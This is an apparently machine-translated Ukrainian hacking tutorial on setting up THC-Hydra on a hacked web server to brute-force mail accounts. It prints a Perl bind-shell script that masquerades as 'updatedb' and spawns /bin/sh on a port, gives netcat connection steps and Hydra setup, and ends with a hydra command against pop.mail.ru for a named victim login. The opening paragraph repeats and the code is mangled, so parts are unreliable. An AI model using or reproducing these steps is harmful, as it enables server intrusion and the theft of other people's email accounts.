Я розповім про те як встановити THC-hydra на зламаний сервак, для Брута поштових скриньок. Плюс цього методу в тому що брут працює навіть при вимкненому комп'ютері т.к hydra висить на серваке ...
THC-Hydra - розпаралеленого зломщик паролів до різних сервісів (ftp, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO та ін.) Для UNIX платформ. За допомогою цієї утиліти ви можете атакувати кілька сервісів одночасно. Я розповім про те як встановити THC-hydra на зламаний сервак, для Брута поштових скриньок. Плюс цього методу в тому що брут працює навіть при вимкненому комп'ютері т.к hydra висить на серваке ...
THC-Hydra - розпаралеленого зломщик паролів до різних сервісів (ftp, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO та ін.) Для UNIX платформ. За допомогою цієї утиліти ви можете атакувати кілька сервісів одночасно.
Нам буде потрібно:
1.THC-hydra
2.c99shell (або будь-який інший)
3.NetCAT - утилитка для back-conect і ін.
4.exploit для Бінде шелла на порт ...
Переходимо в веб короби в папку / tmp / так як найчастіше вона дозволів для запису ...
Для удобсво в роботі ми повісимо шелл на 32762 порт і в наступним пріконектімся netcat \ 'ом ...
1.Откриваем блокнот і копіюємо туди exploit і сщхраняем як bind_port.pl
code:
#! / Usr / bin / perl
$ Port = 32762;
$ Port = $ ARGV [0] if $ ARGV [0];
exit if fork;
$ 0 = \ »updatedb \». \ "\" X100;
$ SIG = \ 'IGNORE \';
use Socket;
socket (S, PF_INET, SOCK_STREAM, 0);
setsockopt (S, SOL_SOCKET, SO_REUSEADDR, 1);
bind (S, sockaddr_in ($ port, INADDR_ANY));
listen (S, 50);
while (1)
accept (X, S);
unless (fork)
open STDIN, \ "# 038; X \»;
open STDERR, \ "> # 038; X \»;
close X;
exec (\ "/ bin / sh \»);
>
close X;
>
Ізаліваем отриманий файл на хост (narod.ru).
Далі дізнаємося гойдалку нашого веб шелла командою which CURL
У моєму випадку вона
Тепер відкриваємо netcat і вбиваємо туди ваш сайт і порт і тиснемо enter ...
Проізошол коннект ...
Тепер заливаємо гідру ...
Тепер компл закачаний архів ...
code:
tar xvzf hydra-5.4-src.tar.gz
Тепер переходимо в папку з гідрою і встановлюємо ...
code:
cd hydra-5.4-src /
І переходимо до установки
даліе слід команда
Установка законченна запускаємо командою
Тепер закидаємо на сервак великий словник з паролями і зберігаємо його. У моєму випадку він називається dic і log в ньому будуть збережуться звіти ...
Заливаємо на гідру сомандой cp dic hydra-5.4-src / dic і cp log hydra-5.4-src / log
І можна приступати до Брут ...
Командуємо ./hydra -l 1xss -P dic -o log.txt -f pop.mail.ru pop3
-l - login жертви
-P - Словник пасів
-o - лог звітів
-f - pop.mail.ru pop3 - думаю ясно))
І можна лягає спати, вранці дивимося лог)))